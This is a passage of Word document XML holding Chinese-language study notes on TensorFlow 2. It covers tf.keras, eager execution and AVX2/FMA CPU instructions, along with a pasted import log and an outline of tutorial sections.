    <w:p w14:paraId="6FC7DE16" w14:textId="77777777" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参考链接：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="619FDEDC" w14:textId="77777777" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00534097">
        <w:t>https://www.bilibili.com/video/BV1Zt411T7zE/?spm_id_from=333.337.search-card.all.click&amp;vd_source=2f908ac18207c5aa72aa605dee4b20a3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D359B47" w14:textId="77777777" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C92C837" w14:textId="77777777" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>训练方面：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>k</w:t>
      </w:r>
      <w:r>
        <w:t>eras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>eager</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:t>cution</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>轻松构建模型。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46179C27" w14:textId="77777777" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12CE6A86" w14:textId="77777777" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>研究方面：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>f.keras</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>允许创建复杂拓扑，包括使用残差层、自定义多输入、输出模型，以及强制编写的正向传递。轻松创建自定义训练循环。低级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>TensorFlow</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>始终可用，并与高级别的抽象一起工作，以实现完全可定制的逻辑。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13D94ECE" w14:textId="77777777" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12B0EA30" w14:textId="77777777" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部署方面，任意平台实现稳健的生产环境模型部署。不</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E6596D5" w14:textId="0A0F818C" w:rsidR="00BF4AFE" w:rsidRDefault="00BF4AFE" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FE98D49" w14:textId="0DDDF08E" w:rsidR="002C54A2" w:rsidRDefault="002C54A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1662328F" w14:textId="151149AA" w:rsidR="002C54A2" w:rsidRDefault="002C54A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="67248980" w14:textId="7FBBE730" w:rsidR="002C54A2" w:rsidRDefault="002C54A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="66A107A8" w14:textId="77777777" w:rsidR="002C54A2" w:rsidRDefault="002C54A2" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="34F01BDF" w14:textId="77777777" w:rsidR="00FC616C" w:rsidRDefault="00FC616C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27046181" w14:textId="77777777" w:rsidR="00D20A83" w:rsidRPr="00D20A83" w:rsidRDefault="00D20A83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20A83">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>&gt;&gt;&gt; import tensorflow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E1D4689" w14:textId="77777777" w:rsidR="00D20A83" w:rsidRPr="00D20A83" w:rsidRDefault="00D20A83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20A83">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2023-02-28 14:41:35.560686: I tensorflow/core/platform/cpu_feature_guard.cc:193] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations:  AVX2 FMA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7427EA35" w14:textId="77777777" w:rsidR="00D20A83" w:rsidRPr="00D20A83" w:rsidRDefault="00D20A83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20A83">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>To enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A50D795" w14:textId="77777777" w:rsidR="00D20A83" w:rsidRPr="00D20A83" w:rsidRDefault="00D20A83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20A83">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2023-02-28 14:41:35.653068: W tensorflow/compiler/xla/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libcudart.so.11.0'; dlerror: libcudart.so.11.0: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: :/usr/local/cuda/lib64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A6B515C" w14:textId="77777777" w:rsidR="00D20A83" w:rsidRPr="00D20A83" w:rsidRDefault="00D20A83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20A83">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2023-02-28 14:41:35.653094: I tensorflow/compiler/xla/stream_executor/cuda/cudart_stub.cc:29] Ignore above cudart dlerror if you do not have a GPU set up on your machine.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="121D1549" w14:textId="77777777" w:rsidR="00D20A83" w:rsidRPr="00D20A83" w:rsidRDefault="00D20A83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20A83">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>2023-02-28 14:41:36.216853: W tensorflow/compiler/xla/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libnvinfer.so.7'; dlerror: libnvinfer.so.7: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: :/usr/local/cuda/lib64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00C6435A" w14:textId="77777777" w:rsidR="00D20A83" w:rsidRPr="00D20A83" w:rsidRDefault="00D20A83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D20A83">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2023-02-28 14:41:36.216913: W tensorflow/compiler/xla/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libnvinfer_plugin.so.7'; dlerror: libnvinfer_plugin.so.7: cannot open shared object file: No such file or directory; LD_LIBRARY_PATH: :/usr/local/cuda/lib64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42ACC756" w14:textId="51127F27" w:rsidR="00234723" w:rsidRDefault="00D20A83" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00D20A83">
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>2023-02-28 14:41:36.216919: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Cannot dlopen some TensorRT libraries. If you would like to use Nvidia GPU with TensorRT, please make sure the missing libraries mentioned above are installed properly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27445CB7" w14:textId="04A5AC54" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="38F8C893" w14:textId="77777777" w:rsidR="00DB0696" w:rsidRDefault="00DB0696" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="804" w:name="_Toc159780225"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">AVX2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>和</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> FMA</w:t>
      </w:r>
      <w:bookmarkEnd w:id="804"/>
    </w:p>
    <w:p w14:paraId="3B337CE1" w14:textId="77777777" w:rsidR="00DB0696" w:rsidRDefault="00DB0696" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002853C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>FMA</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是现代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持的一种高级指令集，中文叫“</w:t>
      </w:r>
      <w:r w:rsidRPr="00DB0696">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>积和熔加运算</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="414A9689" w14:textId="77777777" w:rsidR="00DB0696" w:rsidRDefault="00DB0696" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="657DD498" w14:textId="77777777" w:rsidR="00DB0696" w:rsidRDefault="00DB0696" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="002853C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>AVX</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是现代</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> CPU </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>支持的“</w:t>
      </w:r>
      <w:r w:rsidRPr="002853C0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>高级向量扩展指令集</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>”，显然，这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> AVX2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的意思就是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> AVX </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>进阶版的意思，它引入了上文的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> FMA </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>运算，并将浮点性能提升</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>倍。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2751A85B" w14:textId="77777777" w:rsidR="00DB0696" w:rsidRDefault="00DB0696" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="62D0CFCE" w14:textId="02B47C6F" w:rsidR="00234723" w:rsidRPr="00DB0696" w:rsidRDefault="00DB0696" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>总之，如果</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tensorflow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能够直接使用这些高级功能，那训练速度一定能快上不少，接下来，我们就试试从头开始编译一个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> Tensorflow</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A76B6FB" w14:textId="77777777" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33775BB9" w14:textId="77777777" w:rsidR="00234723" w:rsidRDefault="00234723" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="217C62A1" w14:textId="0DD10857" w:rsidR="00AC4C3B" w:rsidRDefault="00AC4C3B" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2739A42F" w14:textId="7F06CBAA" w:rsidR="005B6C3C" w:rsidRDefault="00234EC1" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="805" w:name="_Toc159780226"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（一）</w:t>
      </w:r>
      <w:r w:rsidR="00534097">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="00534097">
        <w:t>f.keras</w:t>
      </w:r>
      <w:bookmarkEnd w:id="805"/>
    </w:p>
    <w:p w14:paraId="648713AE" w14:textId="2D0AEF8D" w:rsidR="00534097" w:rsidRDefault="00534097" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1794B8EF" w14:textId="451129F0" w:rsidR="00534097" w:rsidRDefault="00534097" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>构建和训练模型的核心高级</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E82A398" w14:textId="77777777" w:rsidR="00534097" w:rsidRDefault="00534097" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A2B8245" w14:textId="000AB1CB" w:rsidR="00534097" w:rsidRDefault="00234EC1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>单输入单输出</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Sequential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顺序模型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184C2CE3" w14:textId="7FC2CE96" w:rsidR="00234EC1" w:rsidRPr="00534097" w:rsidRDefault="00234EC1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>函数式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>API</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1955B4AD" w14:textId="60FAEA2F" w:rsidR="005B6C3C" w:rsidRDefault="005B6C3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="14F6F620" w14:textId="2156761D" w:rsidR="00393166" w:rsidRDefault="00393166" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="806" w:name="_Toc159780227"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（二）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式与自定义训练</w:t>
      </w:r>
      <w:bookmarkEnd w:id="806"/>
    </w:p>
    <w:p w14:paraId="2D656F6A" w14:textId="60FE0508" w:rsidR="005B6C3C" w:rsidRDefault="00811755" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接迭代和直观调试，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式下求解梯度与自定义训练</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54737DDD" w14:textId="1CEB3B11" w:rsidR="00393166" w:rsidRDefault="00393166" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0745C91B" w14:textId="70A7C668" w:rsidR="00B8278A" w:rsidRDefault="00B8278A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r>
        <w:t>.Eager</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>模式</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F73663C" w14:textId="69E65BD2" w:rsidR="00B8278A" w:rsidRDefault="00B8278A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>直接迭代和直观调试</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DA60F4C" w14:textId="3320C52D" w:rsidR="00B8278A" w:rsidRDefault="00B8278A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:t>.tf.GradientTape</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243FC6A4" w14:textId="1BC8998B" w:rsidR="00393166" w:rsidRDefault="00B8278A" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>求解梯度，自定义训练逻辑</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49357FC9" w14:textId="24742DB2" w:rsidR="00393166" w:rsidRDefault="00393166" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1809B9D1" w14:textId="1D2C0969" w:rsidR="00393166" w:rsidRDefault="005D3DC9" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="807" w:name="_Toc159780228"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（三）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>tf</w:t>
      </w:r>
      <w:r>
        <w:t>.data</w:t>
      </w:r>
      <w:bookmarkEnd w:id="807"/>
    </w:p>
    <w:p w14:paraId="3D71C8B4" w14:textId="45963466" w:rsidR="005D3DC9" w:rsidRDefault="005D3DC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>加载图片数据与结构化数据</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E64FB22" w14:textId="77777777" w:rsidR="005D3DC9" w:rsidRPr="005D3DC9" w:rsidRDefault="005D3DC9" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="197C3728" w14:textId="4C36415E" w:rsidR="00393166" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="808" w:name="_Toc159780229"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（四）介绍</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r>
        <w:t>f.function</w:t>
      </w:r>
      <w:bookmarkEnd w:id="808"/>
    </w:p>
    <w:p w14:paraId="11853572" w14:textId="63430D15" w:rsidR="005B6C3C" w:rsidRDefault="005B6C3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E59D5D8" w14:textId="3DCE6581" w:rsidR="00A40C6E" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>自动图运算</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07878910" w14:textId="75A1D239" w:rsidR="005B6C3C" w:rsidRDefault="005B6C3C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5C0AC360" w14:textId="7F17EE43" w:rsidR="005B6C3C" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="809" w:name="_Toc159780230"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（五）卷积神经网络</w:t>
      </w:r>
      <w:bookmarkEnd w:id="809"/>
    </w:p>
    <w:p w14:paraId="541C7407" w14:textId="629C1BC3" w:rsidR="00A40C6E" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19E20546" w14:textId="0EF10475" w:rsidR="00A40C6E" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4F44AE8E" w14:textId="77777777" w:rsidR="00A40C6E" w:rsidRPr="00A40C6E" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="71DAF89F" w14:textId="18E96451" w:rsidR="00A40C6E" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="810" w:name="_Toc159780231"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（六）多输出卷积神经网络综合实例</w:t>
      </w:r>
      <w:bookmarkEnd w:id="810"/>
    </w:p>
    <w:p w14:paraId="4CBA2C06" w14:textId="1D37CFA7" w:rsidR="00A40C6E" w:rsidRDefault="00A40C6E" w:rsidP="009222EB">
